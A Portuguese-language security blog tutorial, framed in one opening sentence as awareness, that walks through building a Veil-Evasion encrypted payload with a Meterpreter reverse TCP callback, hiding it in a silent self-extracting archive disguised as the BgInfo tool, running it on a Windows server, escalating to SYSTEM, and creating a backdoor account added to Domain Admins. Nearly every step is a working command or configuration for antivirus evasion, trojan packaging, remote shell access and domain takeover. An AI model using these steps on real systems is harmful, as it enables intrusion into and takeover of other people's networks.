O objetivo deste artigo é conscientizar sobre os riscos de realizar o download de ferramentas e aplicativos de qualquer site na internet sem que seja o site oficial do desenvolvedor e/ou do fabricante da solução que você tem interesse em utilizar em um ambiente de produção.

Projeto : github.com/n00py/veil

01 - Passo

Execute o comando veil e em seguida use a ferramenta Evasion.

Linux
veil

Veil:> use 1

02 - Passo

Execute o comando list para visualizar todos os payloads disponíveis.

Linux
Veil:> list

03 - Passo

Utilize o payload 29) python/shellcode_inject/aes_encrypt.py

Linux
Veil:> use 29

04 - Passo

Você pode definir diversas opções disponíveis no payload como por exemplo mudar de N (No) para Y (Yes) a opção USE_PYHERION.

Linux
[python/shellcode_inject/aes_encrypt>>]: set USE_PYHERION y

05 - Passo

Digite options para validar a alteração.

Linux
[python/shellcode_inject/aes_encrypt>>]: options

06 - Passo

Digite generate para gerar o payload.

Linux
[python/shellcode_inject/aes_encrypt>>]: generate

07 - Passo

Digite 2 para gerar o shellcode utilizando MSFVenon em seguida pressione a tecla Enter para realizar a conexão reversa utilizando windows/meterpreter/reverse_tcp.

Linux
2 – MSFVenon

[ Enter ] para windows/meterpreter/reverse_tcp

08 - Passo

Informe o LHOST e o LPORT.

Linux
LHOST = 192.168.1.120 ( IP do Kali Linux )

LPORT = 445 ( Porta definida para estabelecer a conexão )

09 - Passo

Informe o no do payload (ex: arquivo).

Linux
arquivo

10 - Passo

Digite 1 para gerar o payload executável utilizando PyInstaller.

Linux
1 – PyInstaller

11 - Passo

O payload arquivo.exe e o Metasploit arquivo.rc foram gerados com sucesso.

Linux
[*] Language: python
[*] Payload Module: python/shellcode_inject/aes_encrypt
[*] Executable written to: /var/lib/veil/output/compiled/arquivo.exe
[*] Source code written to: /var/lib/veil/output/source/arquivo.py
[*] Metasploit Resource file written to: /var/lib/veil/output/handlers/arquivo.rc

12 - Passo

Mover o arquivo.exe para o diretório /var/www/html.

Linux
mv /var/lib/veil/output/compiled/arquivo.exe /var/www/html/

13 - Passo

Realize o download do arquivo.exe.

14 - Passo

Em paralelo já deixe a conexão via Metasploit sendo realizada.

Linux
cd /var/lib/veil/output/handlers/

msfconsole -r arquivo.rc

15 - Passo

Realize o download da ferramenta BgInfo, clique aqui! e descompacte o arquivo BGinfo.zip.

16 - Passo

Entre na pasta BGInfo e copie o arquivo Bginfo.exe para o mesmo local que está o arquivo.exe em seguida remova a pasta BGInfo e o arquivo BGinfo.zip e deixe como esta na imagem abaixo :

17 - Passo

Selecione os dois arquivos arquivo.exe e Bginfo.exe > botão direito > Add to archive…

18 - Passo

Selecione o formato ZIP e marque a opção Create SFX archive.

19 - Passo

Na aba Advanced clique em SFX options…

20 - Passo

Na aba General insira o caminho da pasta no qual os arquivos serão extraídos, C:\Windows\Temp.

21 - Passo

Na aba Setup no bloco Run after extraction insira a sequência de execução :

Bginfo.exe ( Ferramenta )
arquivo.exe ( Arquivo Malicioso )

22 - Passo

Na aba Modes no bloco Silent mode selecione a opção Hide all.

23 - Passo

Na aba Update no bloco Overwrite mode selecione a opção Overwrite all files.

24 - Passo

Na aba Text and Icon no bloco Customize SFX logo and Icon você pode selecionar um arquivo .ICO, em seguida clique em OK em todas as telas.

25 - Passo

O arquivo Downloads.exe será gerado contendo os arquivos arquivo.exe + Bginfo.exe compactados.

26 - Passo

Remova o arquivo.exe e Bginfo.exe e renomei o arquivo Download.exe para Bginfo.exe.

27 - Passo

Copie o arquivo Bginfo.exe para o Servidor Windows.

Execute o arquivo Bginfo.exe.
// Neste momento o arquivo.exe também é executado inciando a conexão remota.

28 - Passo

Retorne ao Kali Linux e observe que a conexão foi realizada com sucesso, basta iniciar a sessão.

Linux
msf exploit(multi/handler) > sessions -i 1

29 - Passo

Com o meterpreter iniciado basta digitar os comandos :

Linux
meterpreter > getuid ( Exibe o usuário logado )

meterpreter > getsystem ( Obter o acesso de System )

meterpreter > getuid ( Exibe o usuário System )

meterpreter > shell ( Realiza o acesso a Shell do Windows )

30 - Passo

Com acesso ao shell execute os comandos :

Windows
C:\Windows\system32>hostname ( Exibe o hostname do Servidor )

C:\Windows\system32>ipconfig ( Exibe o ip do Servidor )

31 - Passo

Criando um usuário no Servidor : Active Directory.

Windows
C:\Windows\system32>net user Marcos P@ssw0rd /add

// Dica : você pode utilizar a opção /add /domain porém como este servidor é um Active Directory basta utilizar apenas o /add para criar um usuário no domínio.

32 - Passo

Você pode verificar a qual grupo o usuário Marcos pertencente digitando :

Windows
C:\Windows\system32>net user Marcos

33 - Passo

Para adicionar o usuário Marcos ao grupo de Domain Admins digite :

Linux
C:\Windows\system32>net group "Domain Admins" Marcos /add /domain

34 - Passo

Você pode verificar a quais grupos o usuário Marcos pertencente digitando (novamente) :

Linux
C:\Windows\system32>net user Marcos

Vídeo

YouTube

👍 Se este artigo te ajudou compartilhe!



  Autor

Marcos Henrique

 São Paulo/SP



  Ferramentas de Exploração

© 2024 - 100SECURITY

Contato